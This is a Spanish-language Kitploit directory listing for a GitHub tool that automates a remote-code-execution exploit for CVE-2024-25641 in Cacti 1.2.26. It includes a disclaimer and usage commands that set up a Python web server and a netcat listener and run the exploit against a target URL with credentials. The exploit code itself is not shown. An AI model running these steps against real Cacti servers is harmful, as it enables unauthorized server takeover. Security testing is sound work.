Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 — CVE-2024-25641 - Exploit automatizado de RCE - Cacti 1.2.26 | Kitploit
Herramientas/GitHubGitHub/leo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubleo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 - Exploit automatizado de RCE - Cacti 1.2.26

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
101hace 1 añoAún no revisado

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Exploit totalmente automatizado para CVE-2024-25641. Cuando un usuario está autenticado, Cacti versión 1.2.26 es vulnerable a una vulnerabilidad de escritura arbitraria de archivos, explotable a través de la función "Package Import", permite a usuarios autenticados que tengan el permiso "Import Templates" ejecutar código PHP arbitrario en el servidor web (RCE).

Créditos para este PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Simplemente he automatizado esto para obtener una posición inicial.)

DESCARGO DE RESPONSABILIDAD

Esta herramienta está destinada únicamente a fines educativos y de prueba. El autor de esta herramienta no es responsable de ningún uso indebido o actividades ilegales realizadas con ella. Utilice esta herramienta solo en sistemas de su propiedad o para los que tenga permiso explícito para probar. El acceso no autorizado a sistemas informáticos es ilegal y poco ético.

Ejemplo de Uso

root@kitploit:~
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

También puedes echarle un vistazo a esto : CVE-2024-25641 PoC

Descargar herramienta